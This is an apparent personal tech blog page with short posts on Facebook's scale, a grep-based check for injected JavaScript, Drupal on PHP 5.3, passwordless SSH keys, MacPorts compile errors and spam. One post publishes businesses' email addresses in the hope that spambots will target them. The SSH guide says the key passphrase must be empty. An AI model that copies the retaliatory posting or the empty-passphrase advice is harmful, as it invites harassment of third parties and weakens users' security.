(apple)mac geek

A few of the big numbers Facebook deals with:
* 500 million active users
* 100 billion hits per day
* 50 billion photos
* 2 trillion objects cached, with hundreds of millions of requests per second
* 130TB of logs every day

Remember, there are only three numbers in computer science: 0, 1, and n. This is what scaling horizontally is – break out the infrastructure so that it’s trivial to add another instance of, say, a database server.

Read the full note from the Facebook engineering team: http://www.facebook.com/note.php?note_id=409881258919

Comments(0)

One of my friend’s sites recently had some javascript hacked, which cunningly hid the contents of what it wrote to the screen so that searching through the files with normal means didn’t even show what files were affected.

So here’s a script which shows possibly hacked files. Assuming you have ssh access to your server, save it as check_for_hacked_js.sh and then chmod 755 it. To run it, type:

./check_for_hacked_js.sh

Once it’s done, check the contents of hacked.txt – and you’ll see all files which have possibly been hacked.

#!/bin/bash

grep -ri "document.write(unescape" * > hacked.txt

Comments(0)

The short story is this: Snow Leopard has php 5.3.0 in, and although Drupal 6.14 now runs on that version, all previous drupal versions run on 5.2. [Solution? Manual compile - instructions below]

(Read the article)

Comments(2)

Turns out it’s legal to spam people if you’re South African.
(Read the article)

Comments(2)

Warning: geeky rant follows. If you don’t care about Flash and Actionscript, don’t bother reading. Go and play in the sunlight, or whatever you people do for fun.
(Read the article)

Comments(1)

Spam sucks. Americans have gotten a lot better at online marketing recently: only double-opt in lists are allowed (by law). Whereas South Africans suck email addresses out of the air and send unsolicited mail (spam) without asking the recipients to opt-in first. I can’t stop them, so the best I can do is publish their email addresses here in the hope spambots will pick them up, and send them lots of spam. Justice? I hope so.

[Update: turns out double-opt in lists aren't required, and South Africans can subscribe people to their newsletters without their permission. In my book, this exactly what spam is, but South African law doesn't agree.]

[Update: I've deleted Diane's details from this post. After emailing her, she promptly responded saying that I'd been on her database for over a year and only sent 3 emails in that time (which is true) and that I could've unsubscribed earlier, which is also true. She denies being a spammer and wants me to only go after bigger companies. While she's incorrect that she's not a spammer (i.e. she sent me unsolicited commercial email) she does say that she spends a lot of money monthly making sure she complies with the marketing regulations. Diane, legally you're in the right (i.e. you can subscribe anyone you like to your newsletter) but if you do that, you're breaching internet etiquette - double opt-in lists are the way to go. I hope you've stopped subscribing random people to your list.]

The Diamond Life @ The Bank, Rosebank, Johannesburg, Sat 19 September

Sent out by anythinggoes.co.za on Sept4 2009, this spam is about some new club launch in Jozi. Didn’t subscribe, lads.

C2IT Computer Hardware

c2it@wec2it.com sales@c2it.co.za prize@c2it.co.za

These guys make me chuckle. Their disclaimer at the bottom of their newsletter says,

We support responsible and ethical email marketing practices. Please know that we respect your right to be purged from this marketing campaign. Removal from this email distribution list is automatically enforced by our email delivery system. Please click here to start the process for email deletion.

Wow, they “respect my right to be purged from this marketing campaign.” What about my right to not be added to it in the first place?!?! They also say,

The person addressed in the email is the sole authorised recipient.

Authorised by who? Not by me, that’s for sure.

We encourage and support best practices in responsible email marketing.

Great! Best practices are double-opt in lists, otherwise you run the risk of annoying some random person out there who posts your website and your email addresses on his blog. I look forward to seeing if this post shows up higher on Google listings on searches for C2IT Computer Hardware.

These guys are also very, very annoyed by C2IT’s spammy practices.

[Updated: some Eagle-eyed car group selling Fords and Mazdas]

[Updated: kaleidoscope advertising and marketing say they got my name from Google.]

Comments(11)

According to “How To Become A Hacker”, No problem should ever have to be solved twice.

My problem: logging into a particular server via ssh. Each time I do that, I’ve got to open Keychain Access, search for “ssh”, find the correct Password item which I added in there previously, open it, click “Show password”, type in my password to unlock my keychain, copy the password, paste it into terminal, and I’m in. A perfect task to be automated!

The outline of the solution is to use public/private key cryptography to automatically authenticate myself to the server without having to use a password each time. The steps are:

• Generate a public and private key pair using using ssh-keygen -t rsa
  Just follow the prompts and choose the defaults (yes, the passphrase must be empty too). Your private key will be saved in /Users/your-name/.ssh/id_rsa and your public key will be saved in /Users/your-name/.ssh/id_rsa.pub
• Edit id_rsa.pub and copy the key into textedit. Make sure the key ends with the username you’ll be logging into the remote system with (something like user@example.com).
• Copy the contents in textedit, ssh into the server as per normal, and append it to the end of the authorized_keys file in the .ssh/ folder.
• To test, log in again using ssh. If all has gone well, you shouldn’t need to re-type your password

You’re done! I’ve added an extra step, by creating a new file called ssh-example.com and putting my full ssh connection string in it. Then I headed over to /usr/bin and did a sudo ln -s /path/to/script/ssh-example.com which means next time I want to connect, I just type ssh-example.com into terminal.

Thanks to these guys for the help.

Comments(0)

I’ve just upgraded a few wordpress sites, and it all went well, except for the fact that it didn’t. This site was easy and quick – I’m impressed with how polished the wordpress experience is. I uploaded the new files, visited wp-admin, and wordpress did it’s thing. Sweet! Changed the theme, realised it didn’t support widgets, so added some code which let it do so, and voila. Done.

Then I did the same for a client’s site, except once the whole upgrade was done, her site was full of characters like

Comments(3)

I’m currently at the Net Prophet conference listening to some fine minds reaching into the future of the connected sphere in South Africa over the next 10 years. Since so many people here are familiar with e-commerce, I’m posing a question to the dev AND marketing minds here.

I’ve developed a few e-commerce websites for South African clients, and each time I go through the same process with them. To get to the point where it’s possible to sell products online, you need:

• A business plan to show to a bank where you will
• apply for a merchant account.

This means you’re paying something around R200 a month so that you can accept credit card payments…AND per-transaction fees of around 5-8%. Not that you’ve accepted any payments yet, but you have the capability. Then you need a payment gateway, which you’ll typically pay around R100 a month for, and you’ll also pay a per-transaction fee, either a set fee or a percentage.

Once all this is done, it’s time to set up a website with a shopping cart, and start selling. The costs look like this:

• R200/month for the merchant account, plus 5-8% transaction fee.
• R100/month for a payment gateway, plus per-transaction fees.
• Monthly website hosting fees, say around R100/month.

Total monthly costs: R400 plus per-transaction fees.

So before we even get to the website design and development costs, we’re looking at R400/month. Obviously people moving small volumes of product can’t spend R400 a month to do this, which is why most SME’s don’t have e-commerce sites.

A great solution is to have PayPal active in South Africa, but they’re not going to do that any time soon, or probably ever. Since I’m a drupal developer, I posted a thread on groups.drupal.org (which has grown quite a lot) to ask what payment gateways people use, and pretty much heard the same story.

So, 2 questions:

• Is getting a merchant account the only way of accepting credit card payments online, if you’re a South African?
• If so, is there an easier and more cost-effective way of doing this>

Comments(15)

I’m a Mac user who loves the world of Unix software. I can’t live without wget, lynx and the GD2 library (for resizing images in drupal).

However, these packages aren’t natively available on Mac. No problem! I have 2 options: Fink or Macports.

I’ve used Fink for over 4 years and by and large have been happy with it. Just last week I was chatting to caktux in the #drupal channel on irc.freenode.net (my Mac irc client is Colloquy – because I can’t find anything better) and he convinced me to start using subversion to manage my drupal module code. No problem, I fired up Fink…and found a horribly outdated version of svn. Not even the “latest unstable” version was close to what it should have been.

Twice in the last 2 weeks I’ve had people tell me that they prefer MacPorts: caktux and Adrian Rossouw. So I decided to uninstall Fink (by opening Fink Commander, selecting all packages, and making sure that both source and binary installs were removed, and then removing the /sw folder) and install MacPorts, which is painless.

wget and lynx were quickly available (sudo port install wget and sudo port install lynx) but GD2 was another story. I got the same error under MacPorts that I got while attempting to install GNUcash under Fink. Compliation exited with this error:

/usr/bin/gcc-4.0 -o hacklocaledir.so -fPIC -bundle hacklocaledir.c
hacklocaledir.c: In function '__open':
hacklocaledir.c:44: error: 'RTLD_NEXT' undeclared (first use in this function)
hacklocaledir.c:44: error: (Each undeclared identifier is reported only once
hacklocaledir.c:44: error: for each function it appears in.)
hacklocaledir.c: At top level:
hacklocaledir.c:113: warning: alias definitions not supported in Mach-O; ignored
make: *** [hacklocaledir.so] Error 1

‘RTLD_NEXT’ undeclared is the offending bit, which means nothing to me. Last time this happened, I search the C files to see if I could manually declare RTLD_NEXT but gave up. Who knows what its value is supposed to be?

Well, the solution is something completely different. Turns out that everything in /usr/local will influence the compiler, particularly the existence of /usr/local/include/dlfcn.h

I can’t remember why that particular file is there or even why renaming it to dlfcn.h.backup allows GNUcash and GD2 to compile, but it does. Googling the error didn’t return many useful results, except from the MacPorts ticket list, so hopefully this blog post will help someone similarly bewildered.

fink, macports, mac os x, compilation, error, RTLD_NEXT

Comments(1)